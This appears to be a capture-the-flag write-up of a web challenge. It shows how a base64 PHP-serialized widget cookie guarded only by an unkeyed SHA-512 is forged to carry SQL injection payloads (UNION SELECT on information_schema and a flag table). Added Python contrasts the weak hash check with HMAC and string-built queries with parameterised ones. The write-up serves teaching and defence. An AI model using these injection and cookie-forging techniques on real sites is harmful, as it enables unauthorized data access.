Once an account had been registered on the site, it had to be logged into. This account could have any username and password.
If you explore the page you will find a background image of a dog. The CSS also had an ASCII image of a dog and contained the text “Doge flage is the key,” which was later changed to “doge flage is not the key.” These were all red herrings and played no part in finding the key.
You could also make widgets on this site, and after some observation you could see the cookies on the page change when a new widget was created.
The widget_tracker cookie was found to be base64 encoded and could be decoded to an ASCII string along the lines of:
a:“number of widgets”:{i:“widget one”;id:“widget one id”;i:“widget two”;id:“widget one id”;}
The widget_validate cookie was found to be just the SHA-512 hash of this string.
After a lot of testing, we found that cookies could be modified and passed containing SQL injections. The format for them was similar to the following:
a:“number of widgets”:{i:“widget one”;s: “length of injection”:”injection”;}
A useful tool for editing cookies is the “edit this cookie” extension for Chrome. Remember to find the length of the injection and input that value after “s:”.
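The two cookies described above are the whole of the site's session integrity, and the flag name gives away the lesson: a hash with no secret is not an integrity check. The following Python is an added example written for this write-up, not the site's own code. It decodes the widget_tracker value quoted later in the write-up, parses and rebuilds the PHP-serialized array (recomputing the s:<length> field the text tells you to adjust), and then puts a plain-SHA-512 widget_validate check side by side with an HMAC-SHA512 check under a server secret. The secret, the function names and the "tampered-widget" value are constructed for the example.

```python
import base64
import hashlib
import hmac
import re
import urllib.parse

# Constructed server secret; an assumption of this example, not a value from the page.
SERVER_SECRET = b"example-server-secret"

# The widget_tracker value quoted in the write-up (URL-encoded base64).
PAGE_TRACKER_COOKIE = ("YToxOntpOjA7czo0NDoiNzkzMykgVU5JT04gU0VMRUNUICosIDEsIDIsIDMg"
                       "RlJPTSBmbGFnOyAtLSAiO30%3D")


def decode_tracker(cookie_value: str) -> str:
    """URL-decode, then base64-decode, a widget_tracker cookie value."""
    return base64.b64decode(urllib.parse.unquote(cookie_value)).decode("ascii")


def encode_tracker(serialized: str) -> str:
    """Inverse of decode_tracker: base64, then URL-encode (so '=' becomes %3D)."""
    return urllib.parse.quote(base64.b64encode(serialized.encode()).decode())


def serialize_widgets(widgets: list[str]) -> str:
    """Build the PHP-serialized array the site stores:
    a:<count>:{i:<index>;s:<length>:"<value>";...}
    s:<length> is the length of the value, which is why an edited
    injection string needs its length recomputed."""
    body = "".join(f'i:{i};s:{len(v)}:"{v}";' for i, v in enumerate(widgets))
    return f"a:{len(widgets)}:{{{body}}}"


_ENTRY = re.compile(r'i:(\d+);s:(\d+):"')


def parse_widgets(serialized: str) -> list[str]:
    """Parse the array back into a list of strings (ASCII assumed), rejecting
    entries whose declared s:<length> does not match the actual value."""
    m = re.fullmatch(r"a:(\d+):\{(.*)\}", serialized, re.S)
    if m is None:
        raise ValueError("not a serialized array")
    count, body = int(m.group(1)), m.group(2)
    values, pos = [], 0
    while pos < len(body):
        e = _ENTRY.match(body, pos)
        if e is None:
            raise ValueError(f"bad entry at offset {pos}")
        length, start = int(e.group(2)), e.end()
        value = body[start:start + length]
        if len(value) != length or body[start + length:start + length + 2] != '";':
            raise ValueError("declared s:<length> does not match the value")
        values.append(value)
        pos = start + length + 2
    if len(values) != count:
        raise ValueError("declared count does not match the entries")
    return values


def validate_weak(tracker_cookie: str, validate_cookie: str) -> bool:
    """What the write-up observed: widget_validate is a plain SHA-512 of the
    decoded tracker. No secret is involved, so any client can produce a
    matching widget_validate for any tracker it likes."""
    digest = hashlib.sha512(decode_tracker(tracker_cookie).encode()).hexdigest()
    return hmac.compare_digest(digest, validate_cookie)


def sign_tracker(serialized: str, secret: bytes = SERVER_SECRET) -> str:
    """HMAC-SHA512 over the serialized tracker, keyed with the server secret."""
    return hmac.new(secret, serialized.encode(), hashlib.sha512).hexdigest()


def validate_hmac(tracker_cookie: str, validate_cookie: str,
                  secret: bytes = SERVER_SECRET) -> bool:
    """Accept the tracker only if widget_validate is its HMAC under the secret."""
    expected = sign_tracker(decode_tracker(tracker_cookie), secret)
    return hmac.compare_digest(expected, validate_cookie)


def forge_demo() -> dict:
    """Client-side tampering: build an arbitrary tracker plus a matching plain
    SHA-512. The weak check accepts it; the HMAC check rejects it, because the
    client cannot compute the HMAC without SERVER_SECRET."""
    tampered = serialize_widgets(["tampered-widget"])  # constructed value
    cookie = encode_tracker(tampered)
    client_digest = hashlib.sha512(tampered.encode()).hexdigest()
    return {
        "weak_accepts": validate_weak(cookie, client_digest),
        "hmac_accepts": validate_hmac(cookie, client_digest),
    }


if __name__ == "__main__":
    print(parse_widgets(decode_tracker(PAGE_TRACKER_COOKIE)))
    print(forge_demo())
```

Both checks use hmac.compare_digest so the comparison itself does not leak timing information; the difference that matters is only whether a secret the client does not hold goes into the computation.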
By experimenting with SQL injections we were able to determine that there was an information schema with four columns, using the following ASCII value of the cookie:
a:1:{i:0;s:109:"7933 or 1-1) UNION SELECT TABLE_NAME, TABLE_NAME, TABLE_NAME, TABLE_NAME FROM information_schema.tables; -- ";}
Within this information schema there was a table named flag, so a new cookie was made to view this table using the following ASCII string:
a:1:{i:0;s:44:"7933) UNION SELECT *, 1, 2, 3 FROM flag; -- ";}
This created the widget_tracker base64 cookie: YToxOntpOjA7czo0NDoiNzkzMykgVU5JT04gU0VMRUNUICosIDEsIDIsIDMgRlJPTSBmbGFnOyAtLSAiO30%3D
This also created the widget_validate cookie: 17cd76a036f7541bac1e669ffada8a9389848e9bd19606689860a294f37800216bd6cfa37c2ff2a402c7809b94fb28185958ddfeb14373f0d4694c48a9704682
These were submitted and the page was refreshed (shown below).
If you inspect an element on the page and sift through the code you will find the key: “key{needs_moar_hmac}”
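The injections above work because the widget ids from the cookie end up spliced into the query text, so a value that closes the IN (...) list and appends a UNION rewrites the query rather than supplying data to it. The following Python is an added example for this write-up, not the site's code: it stands up a constructed SQLite schema with a widgets table and a flag table, shows the string-concatenated lookup the write-up's cookies exploit, and beside it the parameterised lookup that treats every id as a bound integer. The table and column names, the placeholder flag text and the injected value (the shape of the write-up's last cookie, with the trailing semicolon dropped to fit SQLite's one-statement-per-execute rule) are all constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory schema standing in for the site's database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE widgets (id INTEGER PRIMARY KEY, name TEXT, colour TEXT, size TEXT);
        CREATE TABLE flag (value TEXT);
        INSERT INTO widgets VALUES (7933, 'first widget', 'blue', 'small');
        INSERT INTO flag VALUES ('key{placeholder_not_the_real_flag}');
    """)
    return con


def lookup_widgets_vulnerable(con: sqlite3.Connection, widget_ids: list[str]) -> list:
    """The pattern the write-up implies: strings taken from widget_tracker are
    pasted straight into the query, so the query's shape is under the client's control."""
    sql = ("SELECT id, name, colour, size FROM widgets WHERE id IN ("
           + ", ".join(widget_ids) + ")")
    return con.execute(sql).fetchall()


def lookup_widgets_hardened(con: sqlite3.Connection, widget_ids: list[str]) -> list:
    """Parameterised version: the query text depends only on how many ids there
    are, each id is bound as an integer value, and anything that is not an
    integer is rejected before the database ever sees it."""
    try:
        ints = [int(v) for v in widget_ids]
    except ValueError:
        return []
    placeholders = ", ".join("?" for _ in ints)
    sql = f"SELECT id, name, colour, size FROM widgets WHERE id IN ({placeholders})"
    return con.execute(sql, ints).fetchall()


# Constructed tracker value in the shape of the write-up's last cookie.
INJECTED_ID = "7933) UNION SELECT *, 1, 2, 3 FROM flag -- "


def leaks_flag(rows: list) -> bool:
    """True if any returned row carries flag text where a widget id should be."""
    return any(isinstance(r[0], str) and r[0].startswith("key{") for r in rows)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_widgets_vulnerable(db, [INJECTED_ID]))
    print("hardened:  ", lookup_widgets_hardened(db, [INJECTED_ID]))
```

Binding parameters is the fix the query needs; the HMAC on the cookie is a separate layer that stops the tampered tracker from being accepted at all, and the site needed both.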